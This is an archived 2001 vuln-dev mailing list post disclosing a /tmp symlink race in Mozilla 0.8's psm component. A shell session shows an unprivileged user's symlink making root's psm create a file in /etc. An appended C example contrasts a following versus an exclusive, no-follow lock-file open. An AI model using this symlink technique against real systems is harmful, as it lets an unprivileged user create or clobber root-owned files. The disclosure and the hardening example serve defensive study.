Mozilla personal security manager /tmp issues

From: KF (dotslash@snosoft.com)
Date: 12/26/01


Date: Wed, 26 Dec 2001 12:50:59 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@securityfocus.com

Playing with /tmp a bit this morning I ran into the following issue in
mozilla...

*with mozilla open

[root@linuxppc root]# fuser -n file /tmp/.nsmc-0-lock
/tmp/.nsmc-0-lock: 3220 3223 3224 3226 3227 3228 3229
[root@linuxppc root]# ps -ef | grep 3220
root 3220 1 0 12:42 ? 00:00:00 ./psm

sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ ln -s /etc/hrmm /tmp/.nsmc-0-lock
sh-2.05$ ls -al /etc/hrmm
ls: /etc/hrmm: No such file or directory

*wait for root to go to https://www.securepage.com to view his banking
info.

sh-2.05$ ls -al /etc/hrmm
-rw------- 1 root root 0 Dec 26 12:42 /etc/hrmm

Let's see what happened here.... when root went to the secure page
mozilla calls /usr/lib/mozilla/psm

root 3220 1 1 12:42 ? 00:00:00 ./psm
root 3223 3220 0 12:42 ? 00:00:00 ./psm
root 3224 3223 0 12:42 ? 00:00:00 ./psm
root 3226 3223 0 12:42 ? 00:00:00 ./psm
root 3227 3223 0 12:42 ? 00:00:00 ./psm
root 3228 3223 0 12:42 ? 00:00:00 ./psm
root 3229 3223 0 12:42 ? 00:00:00 ./psm

[root@linuxppc root]# strings /usr/lib/mozilla/psm | grep /tmp/.
/tmp/.nsmc-%d-lock
/tmp/.nsmc-%d

Above is how we ended up with /etc/hrmm....

And of course here is my version info.

[root@linuxppc root]# rpm -qa | grep mozilla
Help -> about mozilla says...

  Mozilla 0.8 <http://www.mozilla.org/releases/>
  
Mozilla/5.0 (X11; U; Linux 2.4.4-6.2mdk ppc; en-US; 0.8) Gecko/20010814

mozilla-psm-0.8-7.1mdk
mozilla-irc-0.8-7.1mdk
mozilla-0.8-7.1mdk
mozilla-mail-0.8-7.1mdk
nautilus-mozilla-1.0.1.1-5mdk

[root@linuxppc root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for ppc

*Happy new year@##$~!

-KF
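
An added example, not part of KF's post and not psm's source: it contrasts a lock-file open that follows a pre-planted symlink with one that refuses it, run on a dangling symlink inside a private scratch directory. The page does not show psm's actual open() flags, so `lock_naive` is an assumed pattern consistent with the observed behaviour; all function names and paths are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed pattern: plain O_CREAT follows a symlink sitting at the lock path
 * and creates the file the link points to. */
static int lock_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with EEXIST if anything,
 * including a dangling symlink, already exists at the path. O_NOFOLLOW
 * is an extra guard. */
static int lock_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Places a dangling symlink in a private mkdtemp() directory and runs one
 * opener on it. Returns 1 if the link target was created, 0 if not,
 * -1 on setup failure. *err receives errno from the opener (0 on success). */
static int target_created(int (*opener)(const char *), int *err) {
    char dir[] = "/tmp/lockdemo-XXXXXX";   /* constructed scratch path */
    char lock[64], target[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(lock, sizeof lock, "%s/lock", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lock) != 0) { rmdir(dir); return -1; }
    errno = 0;
    int fd = opener(lock);
    *err = (fd < 0) ? errno : 0;
    if (fd >= 0) close(fd);
    int created = (stat(target, &st) == 0);
    unlink(target); unlink(lock); rmdir(dir);   /* clean up scratch files */
    return created;
}

int main(void) {
    int e = 0;
    int naive = target_created(lock_naive, &e);
    int safe = target_created(lock_safe, &e);
    printf("naive: target created = %d\n", naive);
    printf("safe:  target created = %d (errno %d)\n", safe, e);
    return 0;
}
```

Creating per-user lock files in a directory only that user can write to removes the shared-/tmp race entirely; the exclusive open is the minimum fix when the path must stay in /tmp.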


